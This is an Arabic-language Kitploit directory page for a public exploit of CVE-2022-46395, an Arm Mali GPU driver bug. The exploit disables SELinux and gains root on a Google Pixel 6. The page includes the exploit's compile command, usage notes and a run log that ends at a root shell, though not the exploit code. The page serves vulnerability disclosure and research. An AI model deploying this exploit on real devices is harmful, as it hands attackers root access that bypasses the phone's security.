Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-46395 — استغلال لـ CVE-2022-46395، ثغرة في برنامج تشغيل نواة Arm Mali، يحقق تنفيذ كود عشوائي على مستوى النواة لتعطيل SELinux والحصول على صلاحيات الجذر على Google Pixel 6. | Kitploit
أدوات/GitHubGitHub/smiletablabo/cve-2022-46395
أمان أندرويدتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالفريق الأحمراستغلال الملفات الثنائية
GitHubsmiletablabo/cve-2022-46395

CVE-2022-46395

استغلال لـ CVE-2022-46395، ثغرة في برنامج تشغيل نواة Arm Mali، يحقق تنفيذ كود عشوائي على مستوى النواة لتعطيل SELinux والحصول على صلاحيات الجذر على Google Pixel 6.

عرض المستودع
2114منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة CVE-2022-46395

يمكن العثور على الشرح الكامل هنا. هذا خطأ في برنامج تشغيل نواة Arm Mali قمت بالإبلاغ عنه في نوفمبر 2022. يمكن استخدام الخطأ للحصول على تنفيذ تعسفي لكود النواة من نطاق التطبيقات غير الموثوقة، والذي يُستخدم بعد ذلك لتعطيل SELinux والحصول على صلاحيات الجذر.

تم اختبار الاستغلال على Google Pixel 6 مع تصحيح نوفمبر 2022 ويناير 2023. للرجوع، استخدمت الأمر التالي للترجمة باستخدام clang في ndk-21:

android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o mali_user_buf

يجب تشغيل الاستغلال بعد دقائق قليلة من الإقلاع ومن المرجح أن يستغرق تشغيله بضع دقائق حتى ينجح. ليس من غير المألوف أن تفشل حالات السباق مئات المرات، على الرغم من أن فشل حالة السباق ليس له أي تأثير ضار وأن الاستغلال ككل نادرًا ما يتعطل. إذا نجح، فيجب أن يعطل SELinux ويحصل على صلاحيات الجذر.

oriole:/ $ /data/local/tmp/mali_user_buf                                       
fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys
benchmark_time 357
failed after 100
failed after 200
failed after 300
benchmark_time 343
failed after 400
failed after 500
failed after 600
benchmark_time 337
failed after 700
failed after 800
failed after 900
benchmark_time 334
failed after 1000
failed after 1100
failed after 1200
benchmark_time 363
failed after 1300
finished reset: 190027720 fault: 135735849 772 err 0 read 3
found pgd at page 4
overwrite addr : 76f6100710 710
overwrite addr : 76f5f00710 710
overwrite addr : 76f6100710 710
overwrite addr : 76f5f00710 710
overwrite addr : 76f5d00710 710
overwrite addr : 76f5b00710 710
overwrite addr : 76f5d00710 710
overwrite addr : 76f5b00710 710
overwrite addr : 76f6100fd4 fd4
overwrite addr : 76f5f00fd4 fd4
overwrite addr : 76f6100fd4 fd4
overwrite addr : 76f5f00fd4 fd4
overwrite addr : 76f5d00fd4 fd4
overwrite addr : 76f5b00fd4 fd4
overwrite addr : 76f5d00fd4 fd4
overwrite addr : 76f5b00fd4 fd4
result 50
oriole:/ # 
تنزيل الأداة